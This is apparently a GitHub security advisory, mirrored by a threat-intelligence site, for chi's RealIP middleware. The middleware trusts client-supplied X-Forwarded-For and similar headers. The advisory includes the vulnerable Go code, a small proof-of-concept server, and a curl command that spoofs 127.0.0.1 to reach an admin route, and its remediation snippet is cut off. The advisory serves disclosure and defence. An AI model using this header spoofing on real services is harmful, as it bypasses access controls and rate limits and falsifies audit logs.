highVulnerability

GHSA-rjr7-jggh-pgcp

### Summary realip middleware in go-chi/chi trusts headers like x-forwarded-for without checking them, so attackers can fake their ip and bypass rate limits or access controls ### Details the vuln is in middleware/realip.go , the realIP() function pulls IPs straight from client headers and replaces r.RemoteAddr without checking if the request came from a trusted proxy ```go func realIP(r *http.Request) string { var ip string if tcip := r.Header.Get(trueClientIP); tcip != "" { ip = tcip // controlled by attacker } else if xrip := r.Header.Get(xRealIP); xrip != "" { ip = xrip // controlled by attacker } else if xff := r.Header.Get(xForwardedFor); xff != "" { ip, _, _ = strings.Cut(xff, ",") // controlled by attacker } // ... return ip } ``` no trusted proxy cidr check in place, any client can send these headers ### PoC create a server with chi and use realip middleware ```go package main import ( "fmt" "net/http" "github.com/go-chi/chi/v5" "github.com/go-chi/chi/v5/middleware" ) func main() { r := chi.NewRouter() r.Use(middleware.RealIP) r.Get("/admin", func(w http.ResponseWriter, r *http.Request) { // ip-based access control got bypassed if r.RemoteAddr == "127.0.0.1" { w.Write([]byte("SECRET ADMIN DATA")) return } http.Error(w, "Forbidden", 403) }) http.ListenAndServe(":8080", r) } ``` spoofed the ip to bypass access control ```bash curl -H "X-Forwarded-For: 127.0.0.1" http://localhost:8080/admin ``` ### Impact - ip-based access control bypass lets attackers reach restricted endpoints - rate limiting bypass lets attackers avoid limits by rotating spoofed ips - audit logs show fake ips picked by attacker instead of real ones - attackers can get around geo ip restrictions ## Remediation Recommendation validate proxy cidr first before trusting forwarded ip headers ```go // add your reverse proxy ip address

Properties

ghsa_id
GHSA-rjr7-jggh-pgcp
summary
chi's RealIP Middleware allows IP spoofing via unvalidated X-Forwarded-For header
severity
high
cve_id
GHSA-rjr7-jggh-pgcp
is_ghsa_only
true
ghsa_published
2026-06-25T18:19:15Z
source_url
https://github.com/advisories/GHSA-rjr7-jggh-pgcp
ghsa_updated
2026-06-25T18:19:17Z

Related Entities (13)

REPORTED_BY (1)

[Source]GitHub Advisory Database

VULNERABLE_TO (5)

[Software]go/github.com/go-chi/chi/v2/middleware
[Software]go/github.com/go-chi/chi/v5/middleware
[Software]go/github.com/go-chi/chi/middleware
[Software]go/github.com/go-chi/chi/v3/middleware
[Software]go/github.com/go-chi/chi/v4/middleware

AFFECTS (5)

[Software]go/github.com/go-chi/chi/v4/middleware
[Software]go/github.com/go-chi/chi/v5/middleware
[Software]go/github.com/go-chi/chi/v2/middleware
[Software]go/github.com/go-chi/chi/v3/middleware
[Software]go/github.com/go-chi/chi/middleware

HAS_WEAKNESS (2)

[Weakness]Use of Less Trusted Source
[Weakness]Authentication Bypass by Spoofing

Explore deeper with Ninja Signal's threat intelligence graph